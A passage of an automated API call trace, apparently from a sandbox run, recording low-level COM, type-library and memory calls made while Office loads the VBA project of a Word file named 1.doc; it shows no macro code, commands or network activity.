[0232.240] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a409eeb0) [0232.240] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d83bfb0, cb=0x8) returned 0x1d3a409eeb0 [0232.240] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d398212fa0, cb=0x0) returned 0x0 [0232.240] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d3a409f020 [0232.240] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d398213000, cb=0x0) returned 0x0 [0232.240] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d3a409efb0 [0232.242] SysStringByteLen (bstr="潎浲污") returned 0x6 [0232.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a4286518, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0232.243] SysStringByteLen (bstr="潎浲污") returned 0x6 [0232.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a4286518, cbMultiByte=7, lpWideCharStr=0x1d39dc856e8, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0232.243] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x2a) returned 0x1d3a453e5a0 [0232.243] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d3a453e5a0) returned 0x2a [0232.243] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a453e5a0) [0232.243] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d3984a9f40, cb=0x9f0) returned 0x1d38f0883a0 [0232.243] wcscpy_s (in: _Destination=0x33e4fb03d8, _SizeInWords=0xd, _Source="*\\R" | out: _Destination="*\\R") returned 0x0 [0232.243] _ultow_s (in: _Value=0xffff, _Buffer=0x33e4fb03de, _BufferCount=0xa, _Radix=16 | out: _Buffer="ffff") returned 0x0 [0232.244] wcscpy_s (in: _Destination=0x1d39d7d8aa8, _SizeInWords=0x2d, _Source="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc" | out: _Destination="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0x0 [0232.244] wcscpy_s (in: _Destination=0x1d39d7d8aea, _SizeInWords=0xb, _Source="0561d40719" | out: _Destination="0561d40719") returned 0x0 [0232.244] wcscpy_s (in: _Destination=0x1d39d7c2848, _SizeInWords=0x13, _Source="*\\Rffff*" | out: _Destination="*\\Rffff*") returned 0x0 [0232.244] wcscpy_s (in: _Destination=0x1d39d7c2858, _SizeInWords=0xb, _Source="0561d40719" | out: _Destination="0561d40719") returned 0x0 [0232.244] IUnknown:QueryInterface (in: This=0x1d39d9d5068, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0318 | out: ppvObject=0x33e4fb0318*=0x0) returned 0x80004002 [0232.244] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d5068, ppTLib=0x33e4fb0320, pIndex=0x33e4fb0330 | out: ppTLib=0x33e4fb0320*=0x1d3980663b0, pIndex=0x33e4fb0330*=0x17) returned 0x0 [0232.244] IUnknown:QueryInterface (in: This=0x1d3980663b0, riid=0x7ffce0bdee00*(Data1=0x20411, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb0328 | out: ppvObject=0x33e4fb0328*=0x1d3980663b0) returned 0x0 [0232.244] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb03a0, pDummy=0x33e4fb0328 | out: ppTLibAttr=0x33e4fb03a0, pDummy=0x33e4fb0328*=0x980663b0) returned 0x0 [0232.244] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0232.245] wcscpy_s (in: _Destination=0x33e4fb03d8, _SizeInWords=0xd, _Source="*\\R" | out: _Destination="*\\R") returned 0x0 [0232.245] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb03de, _BufferCount=0xa, _Radix=16 | out: _Buffer="0") returned 0x0 [0232.245] IUnknown:QueryInterface (in: This=0x1d39d9d5068, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0338 | out: ppvObject=0x33e4fb0338*=0x0) returned 0x80004002 [0232.245] IUnknown:QueryInterface (in: This=0x1d39d9d5068, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0318 | out: ppvObject=0x33e4fb0318*=0x0) returned 0x80004002 [0232.245] _ultow_s (in: _Value=0x17, _Buffer=0x33e4fb03e4, _BufferCount=0x7, _Radix=16 | out: _Buffer="17") returned 0x0 [0232.245] wcscpy_s (in: _Destination=0x1d3a4286518, _SizeInWords=0x9, _Source="*\\R0*#17" | out: _Destination="*\\R0*#17") returned 0x0 [0232.245] IUnknown:Release (This=0x1d3980663b0) returned 0xc [0232.245] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0232.245] IUnknown:QueryInterface (in: This=0x1d39d552cd0, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0318 | out: ppvObject=0x33e4fb0318*=0x0) returned 0x80004002 [0232.245] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d552cd0, ppTLib=0x33e4fb0320, pIndex=0x33e4fb0330 | out: ppTLib=0x33e4fb0320*=0x1d3985c4c00, pIndex=0x33e4fb0330*=0x19f) returned 0x0 [0232.245] IUnknown:QueryInterface (in: This=0x1d3985c4c00, riid=0x7ffce0bdee00*(Data1=0x20411, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb0328 | out: ppvObject=0x33e4fb0328*=0x1d3985c4c00) returned 0x0 [0232.245] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c4c00, ppTLibAttr=0x33e4fb03a0, pDummy=0x33e4fb0328 | out: ppTLibAttr=0x33e4fb03a0, pDummy=0x33e4fb0328*=0x985c4c00) returned 0x0 [0232.245] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c4c00) returned 0x0 [0232.245] wcscpy_s (in: _Destination=0x33e4fb03d8, _SizeInWords=0xd, _Source="*\\R" | out: _Destination="*\\R") returned 0x0 [0232.245] _ultow_s (in: _Value=0x1, _Buffer=0x33e4fb03de, _BufferCount=0xa, _Radix=16 | out: _Buffer="1") returned 0x0 [0232.245] IUnknown:QueryInterface (in: This=0x1d39d552cd0, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0338 | out: ppvObject=0x33e4fb0338*=0x0) returned 0x80004002 [0232.245] IUnknown:QueryInterface (in: This=0x1d39d552cd0, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0318 | out: ppvObject=0x33e4fb0318*=0x0) returned 0x80004002 [0232.245] _ultow_s (in: _Value=0x19f, _Buffer=0x33e4fb03e4, _BufferCount=0x7, _Radix=16 | out: _Buffer="19f") returned 0x0 [0232.245] wcscpy_s (in: _Destination=0x1d3a4286518, _SizeInWords=0xa, _Source="*\\R1*#19f" | out: _Destination="*\\R1*#19f") returned 0x0 [0232.245] IUnknown:Release (This=0x1d3985c4c00) returned 0x2b [0232.246] IUnknown:Release (This=0x1d3985c4c00) returned 0x2a [0232.246] IUnknown:QueryInterface (in: This=0x1d39d552800, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0318 | out: ppvObject=0x33e4fb0318*=0x0) returned 0x80004002 [0232.246] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d552800, ppTLib=0x33e4fb0320, pIndex=0x33e4fb0330 | out: ppTLib=0x33e4fb0320*=0x1d3985c4c00, pIndex=0x33e4fb0330*=0x17b) returned 0x0 [0232.246] IUnknown:QueryInterface (in: This=0x1d3985c4c00, riid=0x7ffce0bdee00*(Data1=0x20411, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb0328 | out: ppvObject=0x33e4fb0328*=0x1d3985c4c00) returned 0x0 [0232.246] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c4c00, ppTLibAttr=0x33e4fb03a0, pDummy=0x33e4fb0328 | out: ppTLibAttr=0x33e4fb03a0, pDummy=0x33e4fb0328*=0x985c4c00) returned 0x0 [0232.246] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c4c00) returned 0x0 [0232.246] wcscpy_s (in: _Destination=0x33e4fb03d8, _SizeInWords=0xd, _Source="*\\R" | out: _Destination="*\\R") returned 0x0 [0232.246] _ultow_s (in: _Value=0x1, _Buffer=0x33e4fb03de, _BufferCount=0xa, _Radix=16 | out: _Buffer="1") returned 0x0 [0232.246] IUnknown:QueryInterface (in: This=0x1d39d552800, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0338 | out: ppvObject=0x33e4fb0338*=0x0) returned 0x80004002 [0232.246] IUnknown:QueryInterface (in: This=0x1d39d552800, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0318 | out: ppvObject=0x33e4fb0318*=0x0) returned 0x80004002 [0232.246] _ultow_s (in: _Value=0x17b, _Buffer=0x33e4fb03e4, _BufferCount=0x7, _Radix=16 | out: _Buffer="17b") returned 0x0 [0232.246] wcscpy_s (in: _Destination=0x1d3a4286518, _SizeInWords=0xa, _Source="*\\R1*#17b" | out: _Destination="*\\R1*#17b") returned 0x0 [0232.246] IUnknown:Release (This=0x1d3985c4c00) returned 0x2b [0232.246] IUnknown:Release (This=0x1d3985c4c00) returned 0x2a [0232.246] IUnknown:QueryInterface (in: This=0x1d39d5528b0, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0318 | out: ppvObject=0x33e4fb0318*=0x0) returned 0x80004002 [0232.246] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d5528b0, ppTLib=0x33e4fb0320, pIndex=0x33e4fb0330 | out: ppTLib=0x33e4fb0320*=0x1d3985c4c00, pIndex=0x33e4fb0330*=0xc1) returned 0x0 [0232.246] IUnknown:QueryInterface (in: This=0x1d3985c4c00, riid=0x7ffce0bdee00*(Data1=0x20411, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb0328 | out: ppvObject=0x33e4fb0328*=0x1d3985c4c00) returned 0x0 [0232.246] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c4c00, ppTLibAttr=0x33e4fb03a0, pDummy=0x33e4fb0328 | out: ppTLibAttr=0x33e4fb03a0, pDummy=0x33e4fb0328*=0x985c4c00) returned 0x0 [0232.246] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c4c00) returned 0x0 [0232.246] wcscpy_s (in: _Destination=0x33e4fb03d8, _SizeInWords=0xd, _Source="*\\R" | out: _Destination="*\\R") returned 0x0 [0232.246] _ultow_s (in: _Value=0x1, _Buffer=0x33e4fb03de, _BufferCount=0xa, _Radix=16 | out: _Buffer="1") returned 0x0 [0232.246] IUnknown:QueryInterface (in: This=0x1d39d5528b0, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0338 | out: ppvObject=0x33e4fb0338*=0x0) returned 0x80004002 [0232.246] IUnknown:QueryInterface (in: This=0x1d39d5528b0, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0318 | out: ppvObject=0x33e4fb0318*=0x0) returned 0x80004002 [0232.246] _ultow_s (in: _Value=0xc1, _Buffer=0x33e4fb03e4, _BufferCount=0x7, _Radix=16 | out: _Buffer="c1") returned 0x0 [0232.247] wcscpy_s (in: _Destination=0x1d3a4286518, _SizeInWords=0x9, _Source="*\\R1*#c1" | out: _Destination="*\\R1*#c1") returned 0x0 [0232.247] IUnknown:Release (This=0x1d3985c4c00) returned 0x2b [0232.247] IUnknown:Release (This=0x1d3985c4c00) returned 0x2a [0232.247] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0318 | out: ppvObject=0x33e4fb0318*=0x0) returned 0x80004002 [0232.247] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d552b18, ppTLib=0x33e4fb0320, pIndex=0x33e4fb0330 | out: ppTLib=0x33e4fb0320*=0x1d3985c4c00, pIndex=0x33e4fb0330*=0xc6) returned 0x0 [0232.247] IUnknown:QueryInterface (in: This=0x1d3985c4c00, riid=0x7ffce0bdee00*(Data1=0x20411, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb0328 | out: ppvObject=0x33e4fb0328*=0x1d3985c4c00) returned 0x0 [0232.247] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c4c00, ppTLibAttr=0x33e4fb03a0, pDummy=0x33e4fb0328 | out: ppTLibAttr=0x33e4fb03a0, pDummy=0x33e4fb0328*=0x985c4c00) returned 0x0 [0232.247] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c4c00) returned 0x0 [0232.247] wcscpy_s (in: _Destination=0x33e4fb03d8, _SizeInWords=0xd, _Source="*\\R" | out: _Destination="*\\R") returned 0x0 [0232.247] _ultow_s (in: _Value=0x1, _Buffer=0x33e4fb03de, _BufferCount=0xa, _Radix=16 | out: _Buffer="1") returned 0x0 [0232.247] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0338 | out: ppvObject=0x33e4fb0338*=0x0) returned 0x80004002 [0232.247] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0318 | out: ppvObject=0x33e4fb0318*=0x0) returned 0x80004002 [0232.247] _ultow_s (in: _Value=0xc6, _Buffer=0x33e4fb03e4, _BufferCount=0x7, _Radix=16 | out: _Buffer="c6") returned 0x0 [0232.247] wcscpy_s (in: _Destination=0x1d3a4286518, _SizeInWords=0x9, _Source="*\\R1*#c6" | out: _Destination="*\\R1*#c6") returned 0x0 [0232.247] IUnknown:Release (This=0x1d3985c4c00) returned 0x2b [0232.247] IUnknown:Release (This=0x1d3985c4c00) returned 0x2a [0232.247] IUnknown:QueryInterface (in: This=0x1d39d55b180, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0318 | out: ppvObject=0x33e4fb0318*=0x0) returned 0x80004002 [0232.247] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d55b180, ppTLib=0x33e4fb0320, pIndex=0x33e4fb0330 | out: ppTLib=0x33e4fb0320*=0x1d3985c4c00, pIndex=0x33e4fb0330*=0xd4) returned 0x0 [0232.247] IUnknown:QueryInterface (in: This=0x1d3985c4c00, riid=0x7ffce0bdee00*(Data1=0x20411, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb0328 | out: ppvObject=0x33e4fb0328*=0x1d3985c4c00) returned 0x0 [0232.247] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c4c00, ppTLibAttr=0x33e4fb03a0, pDummy=0x33e4fb0328 | out: ppTLibAttr=0x33e4fb03a0, pDummy=0x33e4fb0328*=0x985c4c00) returned 0x0 [0232.247] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c4c00) returned 0x0 [0232.247] wcscpy_s (in: _Destination=0x33e4fb03d8, _SizeInWords=0xd, _Source="*\\R" | out: _Destination="*\\R") returned 0x0 [0232.247] _ultow_s (in: _Value=0x1, _Buffer=0x33e4fb03de, _BufferCount=0xa, _Radix=16 | out: _Buffer="1") returned 0x0 [0232.248] IUnknown:QueryInterface (in: This=0x1d39d55b180, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0338 | out: ppvObject=0x33e4fb0338*=0x0) returned 0x80004002 [0232.248] IUnknown:QueryInterface (in: This=0x1d39d55b180, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0318 | out: ppvObject=0x33e4fb0318*=0x0) returned 0x80004002 [0232.248] _ultow_s (in: _Value=0xd4, _Buffer=0x33e4fb03e4, _BufferCount=0x7, _Radix=16 | out: _Buffer="d4") returned 0x0 [0232.248] wcscpy_s (in: _Destination=0x1d3a4286518, _SizeInWords=0x9, _Source="*\\R1*#d4" | out: _Destination="*\\R1*#d4") returned 0x0 [0232.248] IUnknown:Release (This=0x1d3985c4c00) returned 0x2b [0232.248] IUnknown:Release (This=0x1d3985c4c00) returned 0x2a [0232.248] IUnknown:QueryInterface (in: This=0x1d39d55b288, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0318 | out: ppvObject=0x33e4fb0318*=0x0) returned 0x80004002 [0232.248] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d55b288, ppTLib=0x33e4fb0320, pIndex=0x33e4fb0330 | out: ppTLib=0x33e4fb0320*=0x1d3985c4c00, pIndex=0x33e4fb0330*=0xe3) returned 0x0 [0232.248] IUnknown:QueryInterface (in: This=0x1d3985c4c00, riid=0x7ffce0bdee00*(Data1=0x20411, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb0328 | out: ppvObject=0x33e4fb0328*=0x1d3985c4c00) returned 0x0 [0232.248] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c4c00, ppTLibAttr=0x33e4fb03a0, pDummy=0x33e4fb0328 | out: ppTLibAttr=0x33e4fb03a0, pDummy=0x33e4fb0328*=0x985c4c00) returned 0x0 [0232.248] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c4c00) returned 0x0 [0232.248] wcscpy_s (in: _Destination=0x33e4fb03d8, _SizeInWords=0xd, _Source="*\\R" | out: _Destination="*\\R") returned 0x0 [0232.248] _ultow_s (in: _Value=0x1, _Buffer=0x33e4fb03de, _BufferCount=0xa, _Radix=16 | out: _Buffer="1") returned 0x0 [0232.248] IUnknown:QueryInterface (in: This=0x1d39d55b288, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0338 | out: ppvObject=0x33e4fb0338*=0x0) returned 0x80004002 [0232.248] IUnknown:QueryInterface (in: This=0x1d39d55b288, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0318 | out: ppvObject=0x33e4fb0318*=0x0) returned 0x80004002 [0232.248] _ultow_s (in: _Value=0xe3, _Buffer=0x33e4fb03e4, _BufferCount=0x7, _Radix=16 | out: _Buffer="e3") returned 0x0 [0232.248] wcscpy_s (in: _Destination=0x1d3a4286518, _SizeInWords=0x9, _Source="*\\R1*#e3" | out: _Destination="*\\R1*#e3") returned 0x0 [0232.248] IUnknown:Release (This=0x1d3985c4c00) returned 0x2b [0232.248] IUnknown:Release (This=0x1d3985c4c00) returned 0x2a [0232.248] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0318 | out: ppvObject=0x33e4fb0318*=0x0) returned 0x80004002 [0232.248] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb0320, pIndex=0x33e4fb0330 | out: ppTLib=0x33e4fb0320*=0x1d3980663b0, pIndex=0x33e4fb0330*=0xf) returned 0x0 [0232.248] IUnknown:QueryInterface (in: This=0x1d3980663b0, riid=0x7ffce0bdee00*(Data1=0x20411, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb0328 | out: ppvObject=0x33e4fb0328*=0x1d3980663b0) returned 0x0 [0232.248] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb03a0, pDummy=0x33e4fb0328 | out: ppTLibAttr=0x33e4fb03a0, pDummy=0x33e4fb0328*=0x980663b0) returned 0x0 [0232.249] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0232.249] wcscpy_s (in: _Destination=0x33e4fb03d8, _SizeInWords=0xd, _Source="*\\R" | out: _Destination="*\\R") returned 0x0 [0232.249] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb03de, _BufferCount=0xa, _Radix=16 | out: _Buffer="0") returned 0x0 [0232.249] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0338 | out: ppvObject=0x33e4fb0338*=0x0) returned 0x80004002 [0232.249] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb0318 | out: ppvObject=0x33e4fb0318*=0x0) returned 0x80004002 [0232.249] _ultow_s (in: _Value=0xf, _Buffer=0x33e4fb03e4, _BufferCount=0x7, _Radix=16 | out: _Buffer="f") returned 0x0 [0232.249] wcscpy_s (in: _Destination=0x1d3a4286518, _SizeInWords=0x8, _Source="*\\R0*#f" | out: _Destination="*\\R0*#f") returned 0x0 [0232.249] IUnknown:Release (This=0x1d3980663b0) returned 0xc [0232.249] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0232.249] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x8) returned 0x1d3a409efd0 [0232.249] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a409efd0) [0232.249] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d8f9c30, cb=0x980) returned 0x1d39d8f9c30 [0232.249] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d8f6d40, cb=0x228) returned 0x1d39d8f6d40 [0232.250] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9c99d0) [0232.250] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x2028) returned 0x1d39d743dc0 [0232.250] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x10020) returned 0x1d39df59da0 [0232.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0232.251] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xd) returned 0x1d39818b510 [0232.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x1d39818b510, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0232.251] _mbscpy_s (in: _Dst=0x7ffce0c08500, _DstSizeInBytes=0x400, _Src=0x7ffce0bc35f8 | out: _Dst=0x7ffce0c08500) returned 0x0 [0232.251] _mbscpy_s (in: _Dst=0x7ffce0c0850a, _DstSizeInBytes=0x3f6, _Src=0x7ffce0bc36f0 | out: _Dst=0x7ffce0c0850a) returned 0x0 [0232.251] _mbscpy_s (in: _Dst=0x7ffce0c08515, _DstSizeInBytes=0x3eb, _Src=0x1d39818b510 | out: _Dst=0x7ffce0c08515) returned 0x0 [0232.251] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39818b510) [0232.251] SysStringByteLen (bstr="潎浲污") returned 0x6 [0232.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a4286518, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0232.251] SysStringByteLen (bstr="潎浲污") returned 0x6 [0232.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a4286518, cbMultiByte=7, lpWideCharStr=0x1d39dc856e8, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0232.251] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x2a) returned 0x1d3a453e1e0 [0232.251] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d3a453e1e0) returned 0x2a [0232.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1Normal.ThisDocument", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0232.251] IMalloc:Alloc 